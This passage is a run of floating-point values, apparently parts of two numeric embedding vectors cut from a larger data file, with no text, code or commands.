016751561,-0.0049298503,0.0041186786,-0.010767035,0.011204053,-0.0029764618,-0.0033847298,0.012844349,0.024153695,-0.01387221,0.004363252,0.0018728368,-0.011491182,0.0023483,0.022065777,0.00377335,-0.0017967243,0.0022276705,0.02819772,0.059990596,0.0018581783,0.018546518,0.015157307,-0.016602766,0.004894288,-0.016943064,-0.020623287,0.03324517,-0.01487511,-0.023183439,0.01581093,-0.00949642,-0.01231482,-0.02086165,0.01616726,-0.023615804,0.0063163936,-0.013105257,-0.028180346,0.011477244,-0.018557189,0.0002178804,0.02456726,-0.017074574,-0.039378647,-0.01189428,0.017955823,0.017857304,-0.005013905,-0.0060874275,-0.013808773,-0.02646286,-0.010896117,0.0058111143,0.015809735,0.02519935,-0.017910456,0.0051916884,-0.017526183,0.0048670094,0.015365869,0.0036595333,0.025421647,-0.0021008276,0.012923284,-0.019330407,0.012558147,-0.009264549,0.02465326,-0.0122472495,-0.011775231,-0.016688177,0.010162199,-0.0037689125,-0.0014417261,-0.0018243581,0.017151903,0.0011169256,-0.021103155,0.012187106,0.006673889,0.0020520955,0.027912134,0.001840958,0.021053648,-0.015969828,0.013022518,0.00007819502,0.009155214,-0.010951565,-0.010983657,0.013959546,0.0017006099,-0.0079316385,0.005286912,-0.020152448,-0.0052084303,-0.0113318395,-0.016619038,-0.00041084137,0.018748466,0.006223005,0.014732096,-0.03193924,-0.008443856,-0.0078078564,0.016494047,-0.003819216,-0.0019023593,0.015992789,0.00060278736,0.008056087,-0.005674198,-0.0073973206,0.0118960785,-0.033789773,0.009542994,0.00054810033,0.02055239,0.0057234047,-0.019699238,0.020659463,0.017460488,-0.0009805667,0.026332399,0.0011432372,0.0074808295,-0.012715026,-0.015039401,-0.012892878,0.019215709,-0.0059769265,0.029278288,0.004366654,-0.008555993,-0.009501829,0.015224458,-0.0031031684,-0.007298768,-0.09666465,-0.028612336,0.023875475,-0.0033292917,0.020300042,-0.000969346,0.017620381,0.0025416801,0.03366675,0.013640602,-0.0147982,-0.011472368,-0.020573137,-0.0011273782,0.002617362,-0.00077875046,-0.03185364,0.015452964,0.015745765,-0.0072454284,-0.012773005,-0.0106296735,-0.005976085,0.02382378,0.011737997,0.008204381,0.009051345,0.037846427,0.021575466,-0.011151232,-0.0017021834,0.019067232,-0.014399089,0.023909185,-0.022345724,-0.001532058,-0.00010541777,-0.007912659,-0.0029270216,0.02796931,0.016431779,-0.00416786,-0.0032215612,0.012409083,0.0067810523,-0.013777986,-0.0037913125,0.034981452,-0.0039733425,-0.0023959596,0.021562373,-0.01516379,-0.0008712543,0.005821423,-0.010188245,-0.017251605,-0.017365485,0.020018931,0.025815286,0.015408943,-0.009875802,0.015239395,-0.018463347,0.007592923,-0.013490943,0.011875879,0.014815444,0.020589784,0.019510854,0.025954898,-0.013507883,0.04093064,-0.0013938531,0.0035210515,0.030219126,-0.01214422,-0.015562181,0.025998738,-0.011465213,0.00049740286,-0.009332611,-0.04773223,0.0006075259,0.010966018,-0.037498076,0.0028616588,-0.009700999,-0.0017432017,-0.02948895,0.012826141,0.022629574,0.030552348,-0.0024329189,0.03065029,0.013136517,0.005912533,0.07984987,0.0038301682,0.0092664715,-0.0117319,0.0073953657,-0.0011091869,-0.017500529,-0.020110348,-0.036220666,0.019919163,0.015539716,0.008209669,-0.015259251,-0.009583778,0.008114359,0.025616188,-0.013060208,0.03095117,0.009169129,0.012412838,-0.014271888,0.0011436251,-0.012389316,-0.00041123328,0.0016382278,0.024450414,0.0018019421,-0.009217374,0.0034851131,-0.035430025,-0.01070216,0.024020664,0.010717645,-0.0010745352,-0.006409204,0.0063834637,-0.001272214,0.0033296747,0.005909869,0.011023359,0.0030871578,0.0014760111,0.017292423,-0.009253445,-0.017841203,0.005406875,0.01757436,-0.0071050613,0.02547574,0.0068329656,-0.02175653,-0.004136614,-0.019619295,0.012991311,-0.00019698689,-0.0061892117,0.03479412,0.009231648,-0.007921938,0.003342117,-0.00059319474,0.00964403,-0.0024902918,0.033416804,0.008279354,0.020124137,0.016110078,0.019802244,0.0054784985,-0.0026302314,-0.007098399,0.0062379637,-0.011928905,0.011830349,-0.011051332,0.0033433328,0.02884449,-0.0692741,0.015295081,-0.0026465072,0.016942061,0.0026374627,0.016584525,0.025021704,-0.005040008,0.0061105974,-0.0019562773,0.0010651541,0.018106546,0.01768071,-0.0010273213,-0.014382339,-0.02168606,-0.0044441246,0.03689811,0.014988792,-0.018044675,-0.026717214,0.01222927,0.0006476134,0.0028971324,0.003702556,0.015229468,-0.016823532,-0.017443381,-0.008989386,0.0040687076,-0.03692042,0.030045087,-0.0047598616,-0.0019564014,0.034833938,0.015561025,0.0020056241,-0.012288478,-0.004752794,-0.021150675,-0.012001466,0.012215677,0.009565541,-0.0016317465,-0.014199981,0.043426648,-0.0074197995,-0.010031642,-0.008343419,-0.0024594762,-0.009187194,-0.009501506,0.042523842,0.017656593,0.024351383,-0.025185175,-0.020987663,-0.003119485,0.011573084,-0.016653223,0.0015239024,0.00032615694,-0.013070007,0.020139074,-0.01193784,0.0039348667,-0.0033585227,0.030171953,0.0038366634,0.03092276,0.029654881,0.015762303,0.017475078,-0.011271521,-0.01980784,0.015585615,0.024761042,-0.0019200877,-0.0071687736,-0.004575803,-0.02478398,0.019444596,0.006500567,0.0051164306,-0.0022967057,0.0024073415,0.0044331634,-0.011789636,0.014543096,-0.02707323,-0.013631861,0.010911107,0.01639083,0.00513,-0.0184921,0.0004686912,-0.0035669133,0.017599972,0.0017175254,-0.0059912363,0.021318495,-0.012895738,-0.0023336832,0.0130516095,0.0027695436,0.01092782,-0.0034887434,-0.009949655,0.009769585,-0.014415567,0.022170719,0.0016262676,0.027501075,0.0110438345,0.0040613445,-0.01670533,-0.0017974734,0.026842317,-0.010584158,0.02435584,0.0014316136,0.014628675,0.006434995,0.023795981,-0.015938235,-0.01443676,0.0137489615,-0.003314421,-0.021134313,-0.012883053,-0.020428006,0.010627241,-0.0014390462,-0.006148886,0.012628011,0.004604161,-0.004884569,0.003685833,-0.009900395,0.00024828853,0.023776876,-0.016488418,0.014906519,0.0053897793,-0.014705032,-0.036491968,-0.025776247,-0.002375875,-0.020936616,-0.0030181229,-0.008065856,-0.0017039584,0.02053246,0.020382721,0.022478733,0.0039812573,-0.00926984,0.028618308,-0.01638428,-0.00018752228,-0.011008101,0.037714213,-0.011497811,0.011080735,0.036566135,-0.04069012,0.03112723,-0.025550656,-0.0036458322,-0.010397651,-0.0062978454,0.024402192,0.025568709,0.008116493,-0.02276389,-0.0032519195,0.004131875,0.009568335,-0.0034332967,-0.0022320473,-0.004570441,-0.015557157,0.028791776,-0.033721045,-0.008536198,0.008431148,0.035098564,-0.023470482,0.008914262,-0.02659566,-0.006186173,-0.008613104,0.00097258546,-0.027518611,0.025084833,-0.019370275,0.0011999931,-0.010678897,0.016964093,-0.03027564,-0.031930264,0.00036101695,-0.07539271,0.01158145,0.020468714,0.014289415,0.039014015,0.00783048,-0.0078039453,-0.011779397,0.0052930275,0.019620715,0.013911788,-0.014402528,-0.015638487,0.01674305,0.020925082,0.0046308986,-0.02101955,-0.0023873886,-0.0056230007,-0.007914193,0.0026905735,-0.0050958884,-0.008478585,-0.009624193,0.026704498,0.020417508,0.00414556,0.002790163,-0.0052922913,0.011969355,-0.009295857,-0.00034833528,-0.0054583526,0.0065243463,-0.0034698588,0.010170873,-0.008803211,0.014882141,-0.030765671,-0.032235436,-0.00095134525,0.0032583459,0.008375556,0.00908678,-0.016997887,0.004518618,-0.020104632,0.00018076324,0.0037006426,0.00059570646,-0.03100941,-0.004044561,0.021091683,0.043796424,-0.0024746426,0.012638038,-0.011984828,-0.028095303,0.016908484,-0.00072354777,0.0023808468,0.014842899,0.014325026,0.017870236,-0.0038757217,0.006210069,0.010850246,0.005053622,0.0045431545,0.0052588363,0.019525012,-0.03546011,-0.013938404,0.0028140417,0.0044374904,0.006201963,0.01468048,-0.017282335,-0.011668826,-0.0007800648,0.038706854,0.011038034,0.010965114,0.0045854636,0.008207927,-0.008495546,0.012991423,0.012740479,0.029394675,0.0067370753,-0.009822442,0.0037691332,0.045172557,0.00462963,0.016180264,0.0075290767,-0.0038279681,0.010137511,-0.036816336,0.02708309,-0.0017397001,0.0038523052,-0.00031197938,-0.015186654,0.0023894196,-0.00034662476,0.00012009678,-0.015317676,0.0049024443,0.005369669,-0.021840358,0.029731715,0.034577817,0.026147898,-0.0071929214,0.004482847,-0.0016850657,0.011328348,-0.006644554,-0.022132479,-0.0268366,-0.01008835,-0.002764314,0.014399494,0.013772649,-0.0019973828,0.002738678,-0.0068352846,-0.030992009,0.007853464,0.0054667564,0.02534604,0.01491649,0.010290049,-0.016582929,0.015864948,0.015821178,-0.0072798827,0.009379891,0.015090886,0.013698737,-0.02163928,-0.0033301904,-0.011666106,-0.027464833,0.011244001,0.019785855,-0.000833256,0.017123701,-0.009866615,-0.029566858,0.024071004,-0.007050932,-0.016045393,-0.0019259722,0.010660479,0.018949972,-0.010650845,-0.017160004,-0.013839615,-0.003533442,0.0118688345,-0.0115985675,-0.013471702,-0.024941908,-0.014524275,-0.010634855,0.011354322,-0.016360724,0.015642708,-0.0036034503,-0.0089112185,0.0068179443,-0.0019719626,-0.012426076,-0.012015674,0.013504537,0.017360099,-0.0005569871,0.007966632,-0.041645613,0.005475541,0.011528622,-0.025534589,0.010699985,-0.018711636,-0.015484301,-0.013364062,0.007050076,-0.0024789402,-0.0060784235,-0.007107522,-0.022485439,-0.011970313,-0.0034905933,-0.025806045,0.005756411,0.0011463787,-0.0057097166,0.017038327,-0.0056045633,0.009916293,-0.0028944423,-0.003549121,0.016324783,0.012951315,0.0037545476,0.02757643,-0.01182699,0.0041329474,0.009203434,0.019181848,0.00584666,0.09351387,0.004167506,0.00936526,-0.016174044,-0.0029653648,-0.01302071,0.008969409,0.004188459,-0.008862899,0.014737587,0.021284092,0.0014727793,0.017893739,-0.013609369,-0.00245487,0.028020516,-0.00028366654,-0.010247192,0.013739254,0.009143116,0.010250984,-0.005000227,-0.003008567,-0.069200866,-0.03298689,-0.075136706,0.038204677,0.020857537,0.018094573,0.028076334,0.018972691,-0.016938014,0.023623873,0.00068373635,-0.0076467777,0.018064663,0.005881736,-0.02685931,0.011514604,-0.00844952,0.0027989394,0.007893956,0.006868694,-0.014419413,-0.021137696,-0.011435277,-0.007200035,-0.0118152145,-0.016129477,-0.0068122735,0.005159656,-0.001235905,0.01846701,0.0005280904,-0.010613245,-0.00035231217,0.009767607,-0.010981108,0.021000566,0.030444058,0.017657286,0.020946799,-0.011795061,-0.0048208986,0.002282867,-0.0065610087,-0.018941589,0.0028722656,-0.014727441,0.00697529,0.0074632415,-0.0050521693,-0.011016655,-0.006448524,-0.00026014488,0.0028144377,-0.0055078897,-0.007221491,-0.007278106,-0.0031447716,0.0016301589,-0.014770111,0.0148823885,-0.009640677,0.0030998609,0.014788929,0.0070280903,0.0048908526,-0.001809372,0.005931019,-0.010511071,0.018369997,0.0139010195,0.036196522,-0.013177512,0.013653594,0.016933417,-0.022048762,-0.023997687,-0.0035489227,-0.00036380312,-0.018717878,0.009784223,0.010592901,0.004703078,-0.023542792,0.01645769,0.031240512,0.008517458,0.00794658,-0.005757836,0.039406884,0.012741792,0.010821268,0.00039194373,0.021783264,-0.027721196,-0.012391105,0.01631088,-0.023998128,0.0030829292,0.036564045,0.015620016,0.050349854,0.0136443665,0.01664241,-0.0019034939,0.0036550676,-0.023235073,0.0071573965,0.008707802,-0.03614332,0.0024411327,0.0192599,0.0007688981,0.0011846886,0.027579859,-0.010977597,0.005489222,-0.013287656,-0.005471176,-0.028505731,-0.0047255196,0.009249291,0.021903126,-0.02135018,0.018154481,0.0030999586,0.0033698974,0.0070885974,-0.0045695966,-0.009530101,-0.005344004,0.0009256613,-0.0045720628,-0.0015199712,-0.024754222,-0.010528969,-0.011559752,-0.004616673,0.0009451348,-0.0040337946,0.012336228,-0.03883581,0.010334293,-0.0028181097,-0.0063914913,-0.0036828616,-0.011257539,-0.0015919389,-0.024357121,-0.0133024305,0.01372292,0.004367703,0.003413311,0.009537709,0.0020428058,0.014955861,-0.0047647604,-0.0052015977,0.028204262,0.005211855,-0.008692574,0.0026211496,0.0150327515,-0.017926233,-0.0020755404,-0.011056239,-0.03339197,0.014431184,0.008530053,0.0035240876,-0.012787551,0.002655559,-0.009383082,0.03343371,-0.012483346,0.018380428,-0.023969583,-0.04123759,0.0075139147,0.016515197,0.010649008,-0.004536283,-0.0013274725,0.0041490938,-0.0024684088,-0.026085017,-0.014786756,-0.012548167,-0.013439744,0.0014899254,-0.002674612,-0.018339155,-0.00094368256,-0.0050182086,0.0075459923,-0.029798966,-0.03947179,-0.0066506257,-0.006979693,0.0060731806,-0.011908535,-0.004866576,0.010889283,0.014086364,-0.03535454,-0.0042053396,0.010369704,-0.021745278,-0.012875053,-0.0049805185,0.019584887,-0.009072365,-0.010848357,-0.0071398234,0.020359226,0.014751289,0.005656389,0.012603991,-0.012206487,0.0017081012,0.017110454,-0.01315376,-0.0028614555,0.0018115139,-0.012069001,0.0045922576,-0.001161968,-0.014903106,-0.028977174,0.0060522743,-0.018454932,-0.015419969,-0.016766014,-0.023697311,-0.016678331,0.012395451,0.008079297,-0.014482231,0.0061725923,0.008138702,0.0005798267,0.016098185,0.0019929933,-0.002037788,0.0054188273,0.0069434308,-0.023346582,0.008356143,-0.0007694721,0.0066429717,0.0032659238,0.030729672,0.015865162,0.009879647,-0.000043664953,-0.008612689,0.00152353,-0.023102948,0.01668185,-0.0333229,-0.019307097,-0.036009386,0.0077051795,-0.014996478,-0.016997345,0.012742378,0.044073924,-0.04231166,-0.007304978,0.023692753,0.0048052813,-0.013434867,0.009565561,0.0223303,-0.013485647,-0.014264182,-0.005212448,0.016216302,-0.01988747,-0.017139426,0.0043064896,-0.0023773871,-0.0048194467,-0.021047,0.0061538173,-0.00963473,-0.0002255829,0.008470246,0.0048613087,0.0031753273,-0.016529884,0.009875215,0.011970493,-0.01749698,0.015139761,0.002020164,0.01692241,0.0004588172,0.030127743,-0.03018985,0.0077669,0.031941745,0.000511474,0.035222042,0.00770801,-0.011855938,-0.0030785478,0.005551069,0.00028655602,0.018984878,-0.0014161916,-0.03293873,-0.014434707,0.0064549716,-0.00007713067,0.120793365,-0.012645525,0.009431659,0.01942898,0.0044998783,-0.013998741,0.02908795,0.026446471,-0.0072399816,0.011127996,0.0145212365,0.013849607,-0.007027612,0.031572293,0.009465179,-0.04134227,0.0090237195,0.11199962,-0.006815875,0.02579665,-0.0016133356,-0.0060876673,0.0075007197,0.0034078308,0.0036593801,-0.06529742,-0.0045894915,-0.017105581,-0.019511117,0.030496929,-0.025164856,0.0047401544,-0.011859396,0.011845621,-0.016042551,0.013678688,0.01090419,0.0017574534,0.0050776913,-0.011884157,0.010480545,0.0019846847,-0.016033372,0.00219778,-0.011187309,-0.0078678755,-0.021128269,0.02520816,0.014882691,0.01207436,0.0033060538,0.0016648738,0.02133989,0.018186133,0.00790879,-0.0017162529,-0.0042125154,-0.0060998024,-0.016573288,0.015887776,0.0003332976,0.017424043,0.0011396359,0.04112645,-0.0017787807,-0.014348454,-0.017068546,0.010391333,0.012618316,0.0104633095,0.02859442,-0.003607649,-0.016372757,-0.02018718,0.041844904,0.009543025,-0.020478612,0.007331632,0.0035057366,0.0028034425,0.027197842,-0.0058349487,-0.006806003,-0.011310477,0.016833736,0.001679748,-0.009443417,0.0009625683,0.036572076,-0.008091273,0.0013703528,0.02260038,-0.005745547,0.01171753,0.020690298,0.011890818,0.0000039219617,-0.009336379,0.0007844448,-0.029688274,-0.006487153,0.013920357,-0.0033796823,-0.020780452,0.014301727,0.022436323,-0.0045691696,-0.019591423,0.0029360075,0.012042805,0.03168296,0.0068840506,-0.0123294955,0.015238843,-0.0068104314,0.010480118,-0.005793193,-0.01593428,-0.03279031,0.006032699,0.010420557,-0.0077703972,-0.005324758,0.004852424,-0.02234795,-0.010171219,0.0063476786,0.011712979,-0.011176877,-0.0013047362,-0.023253787,0.008066255,0.0016737479,0.05721315,-0.0008733251,-0.009451803,0.0065100617,-0.0069130408,-0.032156315,0.0022806711,-0.0066610263,0.025988443,0.01733235,-0.0020163804,-0.006352619,0.007877731,0.01216062,0.004688109],[0.0067884685,-0.0010133231,-0.0077600675,-0.013034765,0.013271115,-0.016854988,-0.011475242,0.015884606,-0.027959144,-0.020877428,0.030084992,0.01663767,-0.01631781,-0.010490083,-0.0042935647,0.012928808,0.029748736,0.0025371322,-0.02846502,-0.013147056,0.019410687,-0.00006465211,-0.0050423997,-0.023432607,0.024397975,0.015094842,-0.00061932724,0.002753344,-0.007825754,0.0053612865,-0.006369521,0.027035553,0.013427135,0.004618887,0.019445844,-0.016469201,-0.021031998,-0.01428657,0.010722459,-0.0033357271,-0.0014075605,0.0038602168,0.006836922,0.006916819,-0.015423516,0.004861358,-0.0055491943,0.024263917,-0.027417263,0.004864506,-0.0011718489,0.006234763,-0.0270524,0.010201199,-0.000057482,-0.0040519084,0.003229023,-0.038255163,0.0021184057,-0.01851458,0.00038247026,0.0032496513,0.0019606056,-0.028646436,-0.009161374,-0.013261817,-0.007311349,-0.013439087,-0.0060773846,-0.018072346,-0.012275132,0.01890137,-0.0003155392,0.010569303,-0.0015767581,0.013192081,0.009283467,-0.021082632,-0.014907062,-0.0038957933,-0.0019197345,-0.009581997,-0.0025865086,-0.008549397,-0.015435663,0.0055459505,-0.002337773,-0.017384011,0.003502497,-0.029010832,-0.0059569716,0.0046692477,0.0240489,0.010973845,-0.0022938773,0.024118941,0.03681964,-0.010619415,0.011063766,0.025121449,-0.030447371,0.0005781653,-0.0074918945,0.0008958564,-0.0016330923,-0.025640778,-0.007792793,-0.01174312,-0.009249993,-0.007568315,0.008942191,0.009963863,0.004076093,-0.02092451,0.0007260481,-0.019307623,-0.002489559,0.0049294094,-0.018133707,-0.00864853,0.00085798843,0.023357594,0.023987764,0.0050479826,-0.020798007,-0.02025607,-0.017963178,0.009693705,0.00055344944,-0.007487718,-0.011641981,0.009488137,0.009672303,-0.021302007,-0.007097828,-0.0010465528,0.004364267,-0.009380545,0.009903055,-0.024103206,0.0037565983,0.011198934,-0.009392479,-0.016748983,0.0042761965,0.017752547,-0.0013083348,0.016754663,0.0106590595,0.007465952,-0.0043207156,-0.0023795657,-0.01877879,-0.010322867,-0.0058219987,0.009908872,-0.007844838,0.01866749,-0.010827173,0.01744152,-0.039344724,0.030038923,0.022110175,-0.023807287,-0.027269263,-0.031731755,0.0048283534,-0.009670085,0.021712383,0.0014975779,0.031661168,0.0065557137,0.012853253,0.015472915,0.024588913,0.01924248,0.0084084,-0.002240879,-0.0043963096,0.01624488,-0.012100103,-0.029980237,0.015033516,0.012278737,-0.014088778,0.0050149364,0.025020247,-0.006899544,-0.025504716,-0.0008072835,-0.004829904,-0.0056416746,-0.00633964,0.008650413,0.0044203866,-0.0082221925,-0.0075124423,0.09666849,-0.019366713,0.008997905,0.0041194786,0.0036569452,-0.030161418,-0.032785866,-0.012580515,-0.018021313,-0.0071323174,-0.028989172,-0.003965784,-0.004954476,0.03867539,-0.005126839,0.013532835,-0.010696092,-0.012944669,-0.07444486,-0.000585709,0.029746508,0.03632022,0.011430286,0.014246224,0.0025905399,0.0073563247,-0.015612276,-0.014387143,0.008048737,-0.022434587,0.00030297402,0.0291386,-0.037118245,0.009539087,-0.008577796,-0.028579134,-0.0037326915,-0.0030531927,0.0037453396,0.000086468004,0.0016539593,0.028889446,-0.008191617,0.0069076377,0.012806716,0.02638016,0.03834746,0.00066948234,-0.008563768,0.0086212875,0.011495396,0.025609985,0.025776783,0.024960307,-0.003425784,0.021613942,0.009822854,0.006821405,-0.00027285994,0.000076606055,-0.00646508,0.007994756,0.0063556456,0.0010307807,0.020707654,-0.015053843,0.0398013,0.025260953,-0.010220139,-0.0058795717,-0.034474485,0.014049502,-0.0065509174,-0.010585522,-0.019724505,0.006849751,0.0008474192,0.026193418,0.0004749471,0.0027972949,0.004849206,-0.0028553943,-0.022208992,0.012233533,-0.009317069,0.008946382,-0.033777177,-0.03328673,0.01204474,-0.00673164,0.009691569,0.026071394,-0.011025476,0.0038574273,0.011380906,0.04121504,0.0022694815,-0.0050399923,-0.007901831,-0.024176529,0.019044485,0.00043577157,-0.011647988,0.014908459,-0.03066595,0.045890283,0.004828799,-0.0033470313,-0.003425445,0.000112024434,0.04301638,-0.0106563335,0.018377917,-0.025460921,-0.008151616,-0.03304217,0.014131759,0.004807174,-0.0063910703,-0.013076853,-0.004808407,0.0063920813,0.0013040914,0.018727975,0.0033431796,0.017341735,-0.029016448,0.0030855916,0.0051311813,-0.0015885419,0.00094181125,0.015500749,0.034743592,-0.007539868,0.012245086,0.0038915114,0.006161031,-0.023914758,0.044165254,-0.009244141,0.017586658,0.001988683,0.033835456,-0.01019002,-0.009787883,0.010982473,0.022227757,0.0024937629,0.004151205,-0.0058079115,0.023216512,0.014268194,0.037718948,0.009059237,0.013195452,0.0075553325,0.008953656,-0.012634033,-0.012830985,-0.009994738,-0.015937932,0.005944373,-0.019307354,-0.021739608,0.0033889122,-0.025234068,0.008872627,0.034129746,-0.00261053,-0.00026783437,-0.0031522254,-0.019650897,-0.014790154,0.026639301,0.0051148105,-0.021354849,0.020374328,-0.02594751,0.0022978196,0.013854735,0.014770038,-0.016848115,0.018172039,-0.04525212,-0.016861293,-0.002005742,0.0012665499,0.017972663,0.023372766,0.014138389,0.01372679,-0.006954202,0.010891442,-0.00722803,0.006425923,0.025878957,-0.016667267,-0.015213006,-0.00666651,-0.023070041,-0.0017569505,-0.03510117,0.019084295,-0.0016499035,0.00036458517,0.0089622475,-0.0045174034,-0.0060572308,-0.0015689543,-0.002487979,-0.03912794,-0.0112528475,0.027872493,0.02285344,0.0048135165,-0.01675787,0.0038030888,-0.031534135,0.013916714,-0.032535367,0.03268942,-0.019354247,0.026758619,0.016636834,-0.02501031,0.027888244,0.020236233,0.014903813,0.022031946,-0.019058242,-0.0041739102,-0.012420033,0.033246305,-0.0014165036,-0.00042985662,0.0005218776,-0.00699549,0.016304601,-0.008822485,0.004557911,0.014279,-0.007952676,-0.008074394,-0.000085043765,0.004963718,-0.027209833,0.0032893796,-0.0010228885,-0.016490713,0.00062013965,0.008881223,0.0074576293,0.008437693,0.0036010775,0.033222295,0.01509981,-0.006325199,-0.00426357,0.038145363,0.006735962,-0.015134821,0.021279221,0.051288534,0.017785102,0.0061936374,-0.0007890949,0.00019450141,0.010494067,-0.018092476,-0.030462204,-0.008982714,-0.0028182215,-0.026787227,-0.028161455,-0.026978204,0.0050372737,0.046436068,-0.005007949,-0.0039506126,-0.0020777965,0.005397512,0.004642132,-0.011983297,-0.028292406,-0.0051107514,0.013893401,0.008849309,0.03343173,0.014563092,0.021427566,0.013896699,-0.0070829582,0.012557416,-0.0078570265,-0.020514952,0.000576682,0.038833402,-0.002566628,0.0055988086,0.0010225497,-0.036503106,0.017665997,-0.0061624255,0.003183227,-0.03119777,0.027178323,0.0067243204,0.01925544,0.01584494,0.024244705,-0.003285252,0.0014991906,0.034775577,0.04195457,-0.0044642068,-0.008586982,0.0004254012,0.0062083723,-0.00226822,0.010775085,-0.016248697,-0.0033521561,-0.004041396,-0.003395782,-0.00082246686,-0.021248557,0.04276962,0.033794157,-0.016956348,0.012307734,-0.008740266,0.0018390128,0.00830517,0.010016772,0.034490786,-0.019654123,-0.028133184,-0.009796537,0.00832838,0.0025353723,0.0018420959,-0.009648955,-0.0049643456,0.007896471,-0.010061946,0.025189757,0.0037048638,0.025339855,-0.03030576,0.013982172,0.021583864,-0.018680263,-0.00013572458,0.0036733714,0.0091974335,0.0007827272,-0.015263302,-0.030273527,-0.002674092,0.012560257,0.010822266,0.004021501,-0.021613583,0.0029417542,-0.02203467,-0.0105558615,0.009118932,0.006466443,0.014738116,0.005815685,0.0054301745,-0.02409936,0.002915364,0.010305678,0.006448766,0.010856263,0.0027130984,0.005818115,0.0029278398,0.021223066,0.014517704,-0.012813669,0.011565551,-0.0031940194,-0.032316912,0.026828576,-0.0053725713,0.016193343,-0.04557751,-0.008036068,-0.00849002,0.0017759274,-0.013395706,0.027810073,-0.00027554884,0.014615716,-0.017929398,-0.025606569,-0.02345203,-0.02800482,-0.029695688,0.0072714845,0.007982318,-0.024480775,-0.012152657,-0.005328578,-0.016117804,-0.017222572,-0.011394472,0.010891909,-0.013509282,0.021051675,0.004124998,-0.01568146,0.0057306373,0.009513306,-0.004154205,-0.009445579,0.026203241,-0.0125484,-0.016807847,-0.005821031,-0.00880657,-0.01470244,-0.012830089,0.005398164,-0.006450304,0.011965785,0.039883703,0.0015505628,-0.025377646,0.0047600265,-0.005366706,0.008154125,-0.013646637,-0.012429128,0.013981897,0.03513472,-0.022340197,-0.018793322,0.0037949986,0.0050067245,0.0013893015,-0.007001969,-0.02112691,-0.072564304,0.004191388,0.00043877334,0.0006183807,-0.0027774342,0.030421615,0.01413095,0.01422612,-0.0029800944,0.0037760704,-0.018138167,-0.018445807,0.008349212,-0.0031040015,0.02653247,0.0049901293,0.00273261,-0.02472935,-0.018388497,-0.040282648,-0.023414124,0.0060121655,0.00135953,0.0012866831,0.013747614,0.00823433,-0.026921239,0.002641148,-0.0063150576,-0.037848767,-0.00061395555,0.010147635,-0.0070925467,0.014189039,-0.033349194,0.007682286,0.0041369856,0.010979822,-0.025075275,-0.005703315,-0.00728014,-0.012005683,-0.011139247,0.0150023475,-0.031997405,0.012050174,0.006426996,0.026351362,0.0027121133,0.014828524,-0.0038451704,0.01639394,0.0025263361,-0.0023197134,-0.014474705,0.02590975,-0.0009304718,0.03490896,0.014924764,0.004835769,-0.0072937477,0.0019592072,-0.031015862,-0.023080109,0.0049822303,0.020285107,0.036709663,0.0079062665,0.029701367,-0.015496659,0.0535892,0.008850249,0.0067152632,-0.007367314,0.011771577,0.003947617,0.0053859674,-0.002387752,-0.017472504,0.027703997,0.0064831977,-0.017369566,-0.008296574,0.045384124,-0.008857789,0.03087277,-0.018972194,0.0034187562,0.010827464,0.00009630175,0.0019560729,-0.0015647504,-0.005607021,-0.02443648,-0.009850502,-0.022469586,-0.008317258,-0.035303038,0.0057390234,0.0050660106,0.013092575,-0.01071188,-0.026700204,-0.014008784,0.009676594,0.0011948626,-0.014647907,-0.009800986,-0.032486815,0.005519895,-0.0019094093,0.0031517025,0.015095773,0.028622296,0.0048457645,0.030767182,-0.020725537,-0.011474879,-0.017790154,-0.0061874175,0.008130628,0.016857013,0.012295456,-0.0028635948,-0.024126317,0.027093709,-0.0108600585,-0.0029291846,0.028004844,0.0051774266,0.017825175,-0.01713691,-0.009629029,0.003092525,-0.013726081,-0.020975903,-0.019492518,-0.02716144,-0.014003884,-0.017912857,-0.005473486,-0.009539922,0.016547564,-0.01190581,0.030222649,0.019804623,-0.0064936657,0.0069050323,0.009871712,0.0021914507,0.020594995,0.030661676,0.018760495,-0.024917489,-0.00036558573,0.024554253,-0.032651998,-0.015136671,0.00008700539,0.011145551,-0.027967565,-0.00017405397,0.0003997594,-0.0142121175,0.017019589,-0.0042024106,-0.025428856,0.019511921,-0.021547703,0.019395865,0.015343003,-0.00021756995,-0.009477966,-0.009398752,-0.015482143,-0.030247765,-0.03799864,0.0029453214,0.0057097133,-0.0039228653,0.023579942,-0.039126832,-0.011618619,-0.011265492,0.012859874,0.0060240645,0.008890711,0.005650931,0.023938607,-0.0016334478,0.021655595,0.0002730009,0.0066616787,-0.0046310388,-0.000687032,0.001283433,-0.0026634808,0.025756566,0.01208581,-0.017904246,0.018838814,0.0036585783,0.017541928,0.014359408,-0.00077508355,0.012251249,0.0099171065,0.012766556,-0.0009681358,0.0040097726,0.020499406,-0.0043263054,0.014013309,0.012723853,0.0070467703,0.006776385,-0.0054277913,-0.05242954,-0.031454325,-0.00855987,-0.0034865201,-0.013464385,0.009389192,0.0070798174,0.005022155,-0.0054815826,0.014225713,0.030906873,-0.009632864,0.017143296,-0.0029909825,-0.010870978,-0.016815873,-0.016511539,-0.004196622,0.005732232,-0.0115515925,0.016104972,0.0026810782,0.022505019,0.0115509685,0.008855198,0.002689057,-0.010861833,0.011894157,-0.022931242,-0.008673351,0.0124240825,-0.010681014,-0.00057988934,0.0077018654,-0.018857507,-0.009803531,-0.003666374,-0.0013250024,0.01820204,-0.000073102754,-0.009080965,-0.015484918,-0.027552424,0.019262034,0.006841863,0.020742772,-0.026110267,0.020602213,-0.00030770755,0.02801971,0.017508527,-0.012934214,-0.012202996,-0.006137736,0.0012876602,0.004301382,0.028192861,0.0011842987,0.003434335,0.008689078,0.014815474,0.014915367,-0.0066696075,0.011596574,0.014509807,0.02843456,-0.013970796,0.002256545,-0.017416958,-0.0078093205,-0.0042818994,0.0102807665,-0.017171692,-0.017016077,0.012212896,0.011846361,-0.0012004746,-0.0074977744,-0.024405196,-0.060389347,0.016726388,-0.021955544,-0.015951106,-0.012510881,0.023376841,0.00839058,0.009811206,0.03423908,0.006636716,0.0012644297,-0.01044785,0.011861124,-0.00622919,0.0065834094,-0.022186952,-0.022756137,-0.024875509,-0.012102127,0.027569668,-0.016816702,0.0045575257,0.020419277,-0.013352066,0.028270336,0.013622975,-0.0021626663,-0.011028765,-0.031509228,0.0067100413,0.005122154,0.023775764,-0.0121484995,-0.003084465,-0.0029419481,0.0015656004,0.0003575596,0.020593675,-0.008142909,0.012397609,-0.013858265,-0.006435023,0.021835487,0.02029963,0.0019538545,-0.0053565786,0.008182355,0.00061150297,0.017830832,-0.004035777,0.017795172,-0.00002994485,-0.00638758,0.010546451,-0.029709395,0.02565977,-0.012758195,0.004561825,-0.00830029,0.019073842,-0.0099249035,0.0060728355,0.036388494,0.020454904,-0.00888282,-0.016662594,-0.0008859752,0.008092114,-0.0009321784